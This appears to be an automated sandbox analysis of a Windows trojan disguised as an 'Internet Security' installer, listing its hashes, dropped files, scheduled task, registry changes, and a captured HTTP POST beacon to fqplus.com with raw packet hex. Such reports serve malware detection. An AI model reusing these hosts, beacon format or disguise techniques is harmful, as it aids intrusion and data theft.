Analysis Date: 2014-10-02 10:14:01
MD5: 03bbac7eb767684720d93000b09f8455
SHA1: f16d3101fe908f5a611ed42bcea58c4b33d598f3

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: ac1803a74d8b505bfb3803ac34ba230e sha1: 23be41a7a317f96c3767f9c70b87c5edf75e8751 size: 8192
Section .rdata md5: 2d14035098fbc58787a3fa024aef021f sha1: 1cae3429477c1663d74fe0fbb6e051838d4b6392 size: 2048
Section .data  md5: 3f0b8c0c8b300cb05eaecdbabcb44a5a sha1: 640eae422001901294ea9d86c9567e994b5cf4a2 size: 105472
Section .rsrc  md5: 0d8a552a16c0d1aef88be291841c1a2d sha1: d8ecd30a9b6ea6d611bbc6439137174ed7e260e7 size: 5120
Timestamp (PE header): 2009-12-15 03:13:26
Version info:
LegalCopyright: Copyright © 2010 qt Setup Technologies
InternalName: Windows setup idd
FileVersion: 3.0.0.0
CompanyName: Jordan Russell
LegalTrademarks:
Comments:
ProductName: Internet Security H
ProductVersion: 3.0.0.0
FileDescription: v Setup Self-Extractor ua
OriginalFilename: Windows setup idd
PEhash: 1263ee088617c83a0fa84c8ef0d6c11e528a62b3
IMPhash: b125375498aa0c8c0ee83ca0e9ab81d4

Runtime Details:


Process
↳ C:\malware.exe

Creates File: C:\WINDOWS\Ojawia.exe
Creates File: C:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates File: PIPE\lsarpc
Creates Process: C:\WINDOWS\Ojawia.exe
Creates Mutex: Global\{BC9BACEF-649A-45ff-A468-C000D051F283}

Process
↳ C:\WINDOWS\Ojawia.exe

Registry: HKEY_CURRENT_USER\Software\K8CE6CA1JO\OhuD ➝ 5
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝ NULL
Creates File: C:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: Global\{BC9BACEF-649A-45ff-A468-C000D051F283}

Network Details:

DNS: ning.com
Type: A
208.82.16.81
DNS: kaskus.us
Type: A
192.31.186.4
DNS: fqplus.com
Type: A
184.168.192.6
DNS: iufaculty.com
Type: A
(no answer recorded)
DNS: topjer.com
Type: A
(no answer recorded)
HTTP POST: http://fqplus.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 184.168.192.6:80

Raw Pcap
0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a206671   ncoded..Host: fq
0x00000060 (00096)   706c7573 2e636f6d 0d0a5573 65722d41   plus.com..User-A
0x00000070 (00112)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000080 (00128)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000090 (00144)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000a0 (00160)   204e5420 352e3029 0d0a436f 6e74656e    NT 5.0)..Conten
0x000000b0 (00176)   742d4c65 6e677468 3a203330 350d0a43   t-Length: 305..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000000d0 (00208)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000e0 (00224)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x000000f0 (00240)   613d652f 65367235 4a5a5231 30466977   a=e/e6r5JZR10Fiw
0x00000100 (00256)   6f474c67 35315167 4339686e 6245786f   oGLg51QgC9hnbExo
0x00000110 (00272)   32316174 33614f59 6773552f 484c6b7a   21at3aOYgsU/HLkz
0x00000120 (00288)   66336375 77704474 52737935 2b65305a   f3cuwpDtRsy5+e0Z
0x00000130 (00304)   5a523733 6c455878 7a394854 64543678   ZR73lEXxz9HTdT6x
0x00000140 (00320)   33306564 63736477 4d4a4f64 41462f56   30edcsdwMJOdAF/V
0x00000150 (00336)   6a567357 48463045 79377a44 4a57392f   jVsWHF0Ey7zDJW9/
0x00000160 (00352)   73394a45 724a3070 66723832 51593662   s9JErJ0pfr82QY6b
0x00000170 (00368)   38484367 53754e61 55716967 346f5633   8HCgSuNaUqig4oV3
0x00000180 (00384)   4242774b 3274327a 37335247 65795544   BBwK2t2z73RGeyUD
0x00000190 (00400)   6a677375 48467043 4c4f696b 5250534c   jgsuHFpCLOikRPSL
0x000001a0 (00416)   39536a75 50314942 38624b70 6a746d4a   9SjuP1IB8bKpjtmJ
0x000001b0 (00432)   30696733 566d5663 4638616f 4f724252   0ig3VmVcF8aoOrBR
0x000001c0 (00448)   52437964 624b5067 4f69452f 6b7a6a67   RCydbKPgOiE/kzjg
0x000001d0 (00464)   4d764145 436d5643 62664b72 4e653657   MvAECmVCbfKrNe6W
0x000001e0 (00480)   6c486768 6b45546a 2f6b4776 38463630   lHghkETj/kGv8F60
0x000001f0 (00496)   5552444d 50686e34 70644941 44714678   URDMPhn4pdIADqFx
0x00000200 (00512)   42482f34 66663845 72776a6c 32555977   BH/4ff8Erwjl2UYw
0x00000210 (00528)   536c6572 34444378 3431415a 3450       Sler4DCx41AZ4P


Strings
..;.'
.
}
..E
.
_,....
..
040904E4
 2010 qt Setup Technologies 
3.0.0.0
BBABORT
Cannot open file "%s". %s
Comments
CompanyName
Copyright 
DVCLAL
Error reading %s%s%s: %s
Failed to get data for '%s'
FileDescription
FileVersion
InternalName
 Internet Security H
Invalid argument to date encode
Invalid argument to time encode
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid property element: %s
Invalid property path
Invalid property type: %s
Invalid property value
Invalid stream format$''%s'' is not a valid component name
Jordan Russell
KR5a
LegalCopyright
LegalTrademarks
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MS Sans Serif
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters!'%s' is not a valid integer value('%s' is not a valid floating point value
OriginalFilename
Out of memory
ProductName
ProductVersion
Property is read-only
Property %s does not exist
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Stream read error
Stream write error
StringFileInfo
TEXTFILEDLG
Translation
VarFileInfo
v Setup Self-Extractor ua
VS_VERSION_INFO
 Windows setup idd
0u4v@ 
1d0=	$
1#)X>s>
2aFBiQ^
2.HzcL
)\@(2i
2o/lGx
33333333?333333
333333333333333333
3333333333333338
3333339
333338
33333833
333838
364uDnKW9
4%)*;,
42hAE:
4NcF@f
5J5WbX
61W0MI
66;DJJ'
6J],3*
6:Z-7~
;|7 u<o
7-:&YV
$7zTb9(
8]itS=
#."9]#
9+Gk<bI
9rsion[
9TaqdX1/
`9W7QXty
9XLvyp
9XxKD~
'A5RMd
ADVRPI
Apr _G
B0S(D"
|B2eU%
'BH\%H
bsI4sb
CA-;ak45
CeqEcO9
c#fWO2$
?Cg7JfR
Cha:F?
cJ8^{_42a
CL0ngIa
~CLv:Z
@.data
dk$Z</
DragQueryFileA
eO<3kA
?"ETVg	
E\V&$hJ
f4DH9S1
FindWindowA
FO6w]&f)N
<fQ$<h^5<1
FrameRect
GetActiveWindow
GetCapture
GetClassInfoA
GKl=wP
%G}m]w
	Gu(p@
H71R7R
Hbbxrc
&>,HD6
hgeHxgyF
hJH$	S
	hPp|x
I@+9;Q
":iJ7~
iK@9yk'
i-}P?['
`	iPr}{
I*yFul0
%JeMr{
jhjD^#/8@
k7(+1K
;Ke3}w
KERNEL32.dll
KERNUL
K_?<+*K
-K X>O
lE9zcj
|&LFkV|`
LG)*:f
LoadLibraryA
LocalAlloc
LocalFree
LocalReAlloc
+#=l'U
l(YnYk?
.<M53R
m5T<2tN<2:J
m[$dLi?_A
M=\X05
]n4 IBcIv
nAkjrr8SlI
NIQSTR7
\no":=
-n}qY/
NWD%Az
	` n:z
[nZBDb
o=5  1
O d<\>
oNr5WUN
OpenIcon
oshell32
P8$Q=/n
;pDtwM|
p$n*&F
P	\Ph9
pu,#Fp
QAE^XZ
-$QJp[
qviSH30K
\r5=?j
'RbClv
`.rdat}
`.rdata
#*r_!F
RK3k]{`
rlGU#*
ro[6jSV
RQPWja
rR/K6TH
s0;lv 
SHELL32.dll
Shell_NotifyIconW
SHFileOperationA
SHGetFolderPathA
SHGetSpecialFolderLocation
~	sVo`
T2RficMr
T2WqP<&
}t(9 	
T!C4}=
T'\er{R
This program must be run under Win32
tiBy?YToW#
TYTbjz8q3
TzYG#9U
 U{FNh
uFqvAH
uq|g8R8
user32.dll
V*hE_*B
Vi6Z#g
VirtualAlloc
VjAM8Gu
_VMMB3
"=V'Ts
W3Q<wk
w;%]]HZ=
wIDMJ2Mfl
 Windows setup idd
wz:]j$Z
=*x&,+
!XeIFq
xjl!0u
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
	Y0Y'}
Y9XuJoAQ
YnETWq
YW[s<Sj=e
yWYkQrT
Zb#PXb
z[Hx+tD`/p@`=if
_*zK+&
	ZPH|Q